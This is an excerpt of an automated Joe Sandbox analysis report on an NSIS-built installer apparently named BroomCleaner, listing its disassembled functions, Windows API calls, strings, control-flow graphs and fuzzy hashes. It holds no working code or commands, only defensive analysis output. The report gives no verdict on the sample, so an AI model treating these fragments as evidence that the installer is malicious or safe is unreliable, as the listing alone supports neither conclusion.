                                                                                                                                                                                                                                                                • Part of subcall function 00408299: GetModuleHandleA.KERNEL32(?,?,004043E5), ref: 004082AE
                                                                                                                                                                                                                                                                • Part of subcall function 00408299: GetProcAddress.KERNEL32 ref: 004082DA
                                                                                                                                                                                                                                                              • GetTempPathA.KERNEL32(00000001,00000001), ref: 0040456F
                                                                                                                                                                                                                                                              • DeleteFileA.KERNEL32 ref: 0040458D
                                                                                                                                                                                                                                                              • GetWindowsDirectoryA.KERNEL32 ref: 004045B6
                                                                                                                                                                                                                                                              • OleUninitialize.OLE32(?,00000000), ref: 0040481C
                                                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 004049AC
                                                                                                                                                                                                                                                                • Part of subcall function 004078A4: CharNextA.USER32 ref: 004078BE
                                                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,?,00000000,?,00000000), ref: 004048A1
                                                                                                                                                                                                                                                              • ExitWindowsEx.USER32 ref: 00404953
                                                                                                                                                                                                                                                                • Part of subcall function 00407CB6: lstrcpynA.KERNEL32(?,?,?,?,?,?,00404457), ref: 00407CD1
                                                                                                                                                                                                                                                                • Part of subcall function 004060FD: lstrcmpiA.KERNEL32 ref: 0040627B
                                                                                                                                                                                                                                                                • Part of subcall function 004060FD: GetFileAttributesA.KERNEL32 ref: 0040628A
                                                                                                                                                                                                                                                              Strings
Memory Dump Source
• Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.2700380855.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2700408230.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2700421319.000000000040B000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2700435588.0000000000412000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2700435588.000000000041D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2700435588.0000000000423000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2700435588.000000000042A000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2700435588.000000000042D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2700435588.0000000000434000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2700522619.0000000000437000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: File$CharExitHandleModuleNextProcessWindows$AddressAttributesCommandCommonControlsCurrentDeleteDirectoryErrorInfoInitInitializeLineModePathProcTempUninitializeVersionlstrcmpilstrcpynlstrlen
                                                                                                                                                                                                                                                              • String ID: /D=$ _?=$"C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exe" $%$($Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$NCRC$UXTHEME$Lq
                                                                                                                                                                                                                                                              • API String ID: 3796326152-3942272051
                                                                                                                                                                                                                                                              • Opcode ID: 7881eb858f1781d71ca17bfc7dda02721ad144d0b1ac4bce1dc96693f36e737c
                                                                                                                                                                                                                                                              • Instruction ID: 1612ab991b91f7509b6110098b19e500dbf275244ae378e5724325f5e1753ea3
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7881eb858f1781d71ca17bfc7dda02721ad144d0b1ac4bce1dc96693f36e737c
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 34F143F0908300AFD720AF65D94876BBBE4EF85704F41887EE5C8A7291D77C58458B6A
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

Control-flow Graph: graph 298, entry block 4085b8-4085d4 (call 40815b)
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • DeleteFileA.KERNEL32 ref: 004085D9
                                                                                                                                                                                                                                                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00408674
                                                                                                                                                                                                                                                              • FindFirstFileA.KERNEL32 ref: 00408694
                                                                                                                                                                                                                                                              • FindNextFileA.KERNELBASE(?,?,?,?,?,?,?,00000000,00000000), ref: 0040879C
                                                                                                                                                                                                                                                              • FindClose.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004087AF
                                                                                                                                                                                                                                                              Strings
Memory Dump Source
• Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.2700380855.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2700408230.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2700421319.000000000040B000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2700435588.0000000000412000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2700435588.000000000041D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2700435588.0000000000423000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2700435588.000000000042A000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2700435588.000000000042D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2700435588.0000000000434000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2700522619.0000000000437000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: FileFind$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                                                                                              • String ID: ?
                                                                                                                                                                                                                                                              • API String ID: 3200608346-1684325040
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2295610775-0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Control-flow Graph

[Figure: control-flow graph of the function at 4060fd; legend: Executed, Not Executed]
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00408299: GetModuleHandleA.KERNEL32(?,?,004043E5), ref: 004082AE
                                                                                                                                                                                                                                                                • Part of subcall function 00408299: GetProcAddress.KERNEL32 ref: 004082DA
                                                                                                                                                                                                                                                              • lstrcmpiA.KERNEL32 ref: 0040627B
                                                                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32 ref: 0040628A
                                                                                                                                                                                                                                                                • Part of subcall function 00407BE3: wsprintfA.USER32 ref: 00407BFE
                                                                                                                                                                                                                                                              • LoadImageA.USER32(?,?,00000000,00000000), ref: 00406317
                                                                                                                                                                                                                                                              • RegisterClassA.USER32 ref: 00406361
                                                                                                                                                                                                                                                              • SystemParametersInfoA.USER32 ref: 00406392
                                                                                                                                                                                                                                                              • CreateWindowExA.USER32 ref: 004063F7
                                                                                                                                                                                                                                                              • ShowWindow.USER32 ref: 0040643E
                                                                                                                                                                                                                                                              • GetClassInfoA.USER32(?,00000000), ref: 00406481
                                                                                                                                                                                                                                                              • GetClassInfoA.USER32 ref: 004064A1
                                                                                                                                                                                                                                                              • RegisterClassA.USER32 ref: 004064B7
                                                                                                                                                                                                                                                              • DialogBoxParamA.USER32 ref: 004064ED
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcmpiwsprintf
                                                                                                                                                                                                                                                              • String ID: _Nb$g$hWq$Lq
                                                                                                                                                                                                                                                              • API String ID: 3995538257-4203105860
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Control-flow Graph

[Figure: control-flow graph of the function at 403f03; legend: Executed, Not Executed]
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00403F0F
                                                                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32 ref: 00403F36
                                                                                                                                                                                                                                                                • Part of subcall function 00407A78: GetFileAttributesA.KERNEL32 ref: 00407A85
                                                                                                                                                                                                                                                                • Part of subcall function 00407A78: CreateFileA.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,00403F5B), ref: 00407AC4
                                                                                                                                                                                                                                                                • Part of subcall function 00407CB6: lstrcpynA.KERNEL32(?,?,?,?,?,?,00404457), ref: 00407CD1
                                                                                                                                                                                                                                                                • Part of subcall function 004078CE: lstrlenA.KERNEL32 ref: 004078DB
                                                                                                                                                                                                                                                                • Part of subcall function 004078CE: CharPrevA.USER32 ref: 004078F0
                                                                                                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,75923160), ref: 00403FB5
                                                                                                                                                                                                                                                                • Part of subcall function 00403AE9: ReadFile.KERNEL32 ref: 00403B15
                                                                                                                                                                                                                                                              • GlobalAlloc.KERNEL32 ref: 00404183
                                                                                                                                                                                                                                                              • CreateFileA.KERNEL32(00000000,00000000), ref: 004041DC
                                                                                                                                                                                                                                                                • Part of subcall function 004039FE: DestroyWindow.USER32 ref: 00403A17
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • soft, xrefs: 00404076
                                                                                                                                                                                                                                                              • Error writing temporary file. Make sure your temp folder is valid., xrefs: 004041EB
                                                                                                                                                                                                                                                              • @, xrefs: 00404294
                                                                                                                                                                                                                                                              • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00404168
                                                                                                                                                                                                                                                              • Inst, xrefs: 00404066
                                                                                                                                                                                                                                                              • Error launching installer, xrefs: 00403F68
                                                                                                                                                                                                                                                              • Null, xrefs: 00404082
                                                                                                                                                                                                                                                              • Lq, xrefs: 00404266
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: File$Create$AllocAttributesCharCountDestroyGlobalModuleNamePrevReadSizeTickWindowlstrcpynlstrlen
                                                                                                                                                                                                                                                              • String ID: @$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft$Lq
                                                                                                                                                                                                                                                              • API String ID: 3119619987-954420035
                                                                                                                                                                                                                                                              • Opcode ID: 86ceb0f55910d5bee0ed91d50a485dda6c60a6ff79fcc7ad8f2db1f11ee4e7d1
                                                                                                                                                                                                                                                              • Instruction ID: b38f96b7e78b57fcd3b2806388120572df800b880dbb1f433db2e5bcd9a6e09c
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 86ceb0f55910d5bee0ed91d50a485dda6c60a6ff79fcc7ad8f2db1f11ee4e7d1
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1791A4B09083048FD720AF29D98576EBBF4EF84318F41847EE584A7291D77C9985CF9A
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: File$Read$PointerWrite
                                                                                                                                                                                                                                                              • String ID: PB@
                                                                                                                                                                                                                                                              • API String ID: 2113905535-661560245
                                                                                                                                                                                                                                                              • Opcode ID: c65ee0b9422e546ce60fc59843fb5b504002c352310d15ee9ec7ff5b6d871d70
                                                                                                                                                                                                                                                              • Instruction ID: 6b6e275f29c4804299ca632934389f045b276b78e87a5faa28d99019ded5aa05
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c65ee0b9422e546ce60fc59843fb5b504002c352310d15ee9ec7ff5b6d871d70
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DC41FAB0A043059FDB10DF69C98479EBBF4FF84355F50893AE854A3290D378D9458B9A
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • CompareFileTime.KERNEL32(?,00000000), ref: 00401BA1
                                                                                                                                                                                                                                                                • Part of subcall function 00407CB6: lstrcpynA.KERNEL32(?,?,?,?,?,?,00404457), ref: 00407CD1
                                                                                                                                                                                                                                                                • Part of subcall function 00407836: MessageBoxIndirectA.USER32 ref: 00407899
                                                                                                                                                                                                                                                                • Part of subcall function 00406FCB: SetWindowTextA.USER32 ref: 00407061
                                                                                                                                                                                                                                                                • Part of subcall function 00406FCB: SendMessageA.USER32 ref: 004070A1
                                                                                                                                                                                                                                                                • Part of subcall function 00406FCB: SendMessageA.USER32 ref: 004070CF
                                                                                                                                                                                                                                                                • Part of subcall function 00406FCB: SendMessageA.USER32 ref: 004070EE
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Message$Send$CompareFileIndirectTextTimeWindowlstrcpyn
                                                                                                                                                                                                                                                              • String ID: Installed$SOFTWARE\BroomCleaner
                                                                                                                                                                                                                                                              • API String ID: 645384303-529226407
                                                                                                                                                                                                                                                              • Opcode ID: 6dca993ec0eefca6d03842fbfcb9c9df22dc411f7cc7b8210fc120c616c04e92
                                                                                                                                                                                                                                                              • Instruction ID: b5f2e25a14bd4d2b29e972ea4905dfdb01325226fa6e36a277c804736715cb88
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6dca993ec0eefca6d03842fbfcb9c9df22dc411f7cc7b8210fc120c616c04e92
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 71614FB09087009ED710BF65CA45A6FBAF8EF80714F018A2FF4C4A7291D77C58818B6B
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 472 403b63-403b8d GetTickCount 473 403b93-403be0 call 403b31 SetFilePointer 472->473 474 403d35-403d43 call 4039fe 472->474 480 403be3-403c11 call 403ae9 473->480 479 403d48-403d4f 474->479 483 403d45 480->483 484 403c17-403c27 480->484 483->479 485 403c2d-403c34 484->485 486 403c36-403c3d 485->486 487 403c68-403c88 call 40893d 485->487 486->487 488 403c3f-403c63 call 4039fe 486->488 492 403c8a-403c96 487->492 493 403cec-403cf1 487->493 488->487 494 403c98-403cc3 WriteFile 492->494 495 403cdf-403ce6 492->495 493->479 496 403cf3-403cf8 494->496 497 403cc5-403cc8 494->497 495->493 498 403ce8-403cea 495->498 496->479 497->496 499 403cca-403cd7 497->499 498->493 500 403cfa-403d0d 498->500 499->485 501 403cdd 499->501 500->480 502 403d13-403d32 SetFilePointer 500->502 501->500 502->474
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00403B7B
                                                                                                                                                                                                                                                                • Part of subcall function 00403B31: SetFilePointer.KERNEL32 ref: 00403B56
                                                                                                                                                                                                                                                              • SetFilePointer.KERNEL32 ref: 00403BCB
                                                                                                                                                                                                                                                                • Part of subcall function 00403AE9: ReadFile.KERNEL32 ref: 00403B15
                                                                                                                                                                                                                                                              • WriteFile.KERNEL32 ref: 00403CB8
                                                                                                                                                                                                                                                              • SetFilePointer.KERNEL32 ref: 00403D2F
                                                                                                                                                                                                                                                                • Part of subcall function 004039FE: DestroyWindow.USER32 ref: 00403A17
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: File$Pointer$CountDestroyReadTickWindowWrite
                                                                                                                                                                                                                                                              • String ID: Lq
                                                                                                                                                                                                                                                              • API String ID: 1725291646-2684343615
                                                                                                                                                                                                                                                              • Opcode ID: 18ae4545f5b30c3c28caf4f3d11ae2cad8807af871cef0b76668dc3cb6943506
                                                                                                                                                                                                                                                              • Instruction ID: f7083fb0e86bb6005b9bf14dc6a8331a2f5849a6e81c63e88d49bae7df8a1a75
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 18ae4545f5b30c3c28caf4f3d11ae2cad8807af871cef0b76668dc3cb6943506
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D3514AB1A183049FD720DF29E88532A7BB4FF44355F90893EE844A72A0D7789546CF9E
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 503 402860-402863 504 402869-40288e call 401400 * 2 503->504 505 40297c-402983 503->505 515 402890-4028b0 LoadLibraryExA 504->515 516 4028b8-4028c6 GetModuleHandleA 504->516 507 402a36-402a41 call 40163b 505->507 514 403831-403842 507->514 518 402970-402977 515->518 519 4028b6 515->519 516->515 520 4028c8-4028db GetProcAddress 516->520 518->507 519->520 522 40292d-40293f call 406fcb 520->522 523 4028dd-4028e5 520->523 530 402944-40294b 522->530 525 4028e7-4028fc call 40163b 523->525 526 4028fe-40292b 523->526 525->530 526->530 530->514 532 402951-40295c call 404a27 530->532 532->514 536 402962-40296b FreeLibrary 532->536 537 403677-403678 536->537 537->514
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Library$AddressFreeHandleLoadModuleProc
                                                                                                                                                                                                                                                              • String ID: #v
                                                                                                                                                                                                                                                              • API String ID: 1437655972-3234020506
                                                                                                                                                                                                                                                              • Opcode ID: 1b6a0fabb82879a4a9aeeaa7f443e577fde00d5210071419eec9afd89e7f40fe
                                                                                                                                                                                                                                                              • Instruction ID: e70ddef41f08cbfaa68bc2c18546323f80d3119e0e26b2f1059722deacc19af5
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1b6a0fabb82879a4a9aeeaa7f443e577fde00d5210071419eec9afd89e7f40fe
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E2318FB16083009FD7106F258D4876EBAE8BF84764F51893FE485A33D0D7B88886DB1A
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 538 40820e-40823a GetSystemDirectoryA 539 40824b-40824d 538->539 540 40823c-408249 538->540 541 408252-408296 wsprintfA LoadLibraryExA 539->541 540->541
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
Similarity
• API ID: DirectoryLibraryLoadSystemwsprintf
• String ID: \$C@
• API String ID: 2200240437-1790911818
• Opcode ID: c9660503d559c2df304355e59e8a4c4b93ddf83edb93a1dccef26b9b85dfc474
• Instruction ID: 6c0f10e39fe67b0a46f2467a814b7d530fefee384e0f0f9ebaf92f9caf306ff0
• Opcode Fuzzy Hash: c9660503d559c2df304355e59e8a4c4b93ddf83edb93a1dccef26b9b85dfc474
• Instruction Fuzzy Hash: 3D014BB1508704AFD300EF68D98879EBBF4FB84308F54C83DD08996295D7789589CB5A
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 542 408299-4082b9 GetModuleHandleA 543 4082bb-4082be call 40820e 542->543 544 4082cc-4082e1 GetProcAddress 542->544 547 4082c3-4082ca 543->547 546 4082e2-4082e8 544->546 547->544 547->546
APIs
• GetModuleHandleA.KERNEL32(?,?,004043E5), ref: 004082AE
• GetProcAddress.KERNEL32 ref: 004082DA
  • Part of subcall function 0040820E: GetSystemDirectoryA.KERNEL32 ref: 00408229
  • Part of subcall function 0040820E: wsprintfA.USER32 ref: 00408270
  • Part of subcall function 0040820E: LoadLibraryExA.KERNEL32 ref: 00408289
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
Similarity
• API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
• String ID: UXTHEME$C@$C@
• API String ID: 2547128583-1808485004
• Opcode ID: f6ce91f65d8d9bb7ee18f4d542f9107f4d6a72ffda61794c9569e264c57c3d17
• Instruction ID: 23c7ce911dd590b504e17f07e60dbba2231cf2c7d4590c8d4e2d2ec4458658d6
• Opcode Fuzzy Hash: f6ce91f65d8d9bb7ee18f4d542f9107f4d6a72ffda61794c9569e264c57c3d17
• Instruction Fuzzy Hash: 8AF08275A00A089BD710AF65D98446FBBF8FB88750B01C47DF98493324EA3499608B9A
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 548 402613-402637 call 401400 call 406fcb call 407779 554 40263c-402641 548->554 555 402647-40264e 554->555 556 402a3c-402a41 554->556 557 402650 555->557 558 4026b3-4026b5 555->558 559 403831-403842 556->559 560 402656-40266a WaitForSingleObject 557->560 562 4026c5-4026ce CloseHandle 558->562 563 40267b-402697 GetExitCodeProcess 560->563 564 40266c-402679 call 408848 560->564 562->556 566 403677-403678 562->566 568 4026b7-4026c3 563->568 569 402699-4026b2 call 407be3 563->569 564->560 566->559 568->562 569->558
APIs
  • Part of subcall function 00406FCB: SetWindowTextA.USER32 ref: 00407061
  • Part of subcall function 00406FCB: SendMessageA.USER32 ref: 004070A1
  • Part of subcall function 00406FCB: SendMessageA.USER32 ref: 004070CF
  • Part of subcall function 00406FCB: SendMessageA.USER32 ref: 004070EE
  • Part of subcall function 00407779: CreateProcessA.KERNEL32 ref: 004077D6
  • Part of subcall function 00407779: CloseHandle.KERNEL32 ref: 004077EB
• WaitForSingleObject.KERNEL32 ref: 00402661
• GetExitCodeProcess.KERNEL32 ref: 00402688
  • Part of subcall function 00408848: PeekMessageA.USER32 ref: 00408878
  • Part of subcall function 00408848: DispatchMessageA.USER32 ref: 00408884
• CloseHandle.KERNEL32 ref: 004026C8
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
Similarity
• API ID: Message$Send$CloseHandleProcess$CodeCreateDispatchExitObjectPeekSingleTextWaitWindow
• String ID: d
• API String ID: 3753073698-2564639436
• Opcode ID: 9343e43865e4207d9138f12a8f752cf886ae069070fe727ca0ca3e2bbeffcac1
• Instruction ID: ac6e98feb3a7424ea682bb54f7c96fcb1bdc6a13fb689d46f8fa2a7810285b5b
• Opcode Fuzzy Hash: 9343e43865e4207d9138f12a8f752cf886ae069070fe727ca0ca3e2bbeffcac1
• Instruction Fuzzy Hash: 4C218171908600DFD750AF25CD48BAEB7E5EB84315F51887EE489A3380D6795981CF2A
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 573 4076b0-40770e CreateDirectoryA 574 407710-407712 573->574 575 407714-407721 GetLastError 573->575 576 407741-407748 574->576 575->576 577 407723-40773d SetFileSecurityA 575->577 577->574 578 40773f GetLastError 577->578 578->576
APIs
Memory Dump Source
• Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3449924974-0
                                                                                                                                                                                                                                                              • Opcode ID: 2da82589d8da42b9739c6c0976e1894f0ad9be4ebc54cecaf41c4c862e70e725
                                                                                                                                                                                                                                                              • Instruction ID: 0b729d7567636c09f29e4728680a85774f46e6e2b236e770b8bd2138b4be8b02
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2da82589d8da42b9739c6c0976e1894f0ad9be4ebc54cecaf41c4c862e70e725
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0B110CB1D04208DEDB109FA9D8447DEBFB4EF94354F10882AE944B7250D3796545CBAE
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Global$AllocFree
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3394109436-0
                                                                                                                                                                                                                                                              • Opcode ID: cd7b7cc6089db85a917c869ea418fe9b4336126d354651c2af7450458f0d2819
